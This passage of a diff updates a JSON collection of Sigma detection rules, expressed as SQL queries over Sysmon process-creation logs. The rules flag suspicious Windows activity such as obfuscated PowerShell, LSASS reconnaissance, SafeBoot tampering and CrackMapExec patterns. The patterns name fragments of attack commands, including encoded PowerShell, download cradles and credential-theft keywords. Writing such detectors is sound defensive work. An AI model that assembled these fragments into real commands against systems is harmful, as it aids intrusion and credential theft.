OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Process Creation Using Sysnative Folder", - "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", - "status": "experimental", - "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Suspicious Extrac32 Alternate Data Stream Execution", + "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "status": "test", + "description": "Extract data from cab file and hide it in an alternate data stream", + "author": "frack113", "tags": [ - "attack.t1055" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_susp_sysnative.yml" + "filename": "proc_creation_win_lolbin_extrac32_ads.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", - "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", + "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "status": "experimental", + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate piping of the password to anydesk", + "Some FP could occur with similar tools that uses the same command line '--set-password'" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", - "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", + "status": "test", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1053.005" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Windows Binary Executed From WSL", - "id": "ed825c86-c009-4014-b413-b76003e33d35", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "status": "experimental", - "description": "Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1202" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", - "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "status": "experimental", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.g0069" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "title": "Renamed AutoHotkey.EXE Execution", + "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "blueteamer8699", + "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", + "author": "Nasreddine Bencherchali", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.defense_evasion" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_lolbin_gather_network_info.yml" - }, - { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", - "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((Image LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR Image LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_renamed_autohotkey.yml" }, { - "title": "Arbitrary File Download Via MSPUB.EXE", - "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", - "status": "experimental", - "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218" + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mspub_download.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", - "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", - "author": "frack113", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powercfg_execution.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Use NTFS Short Name in Command Line", - "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "test", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE 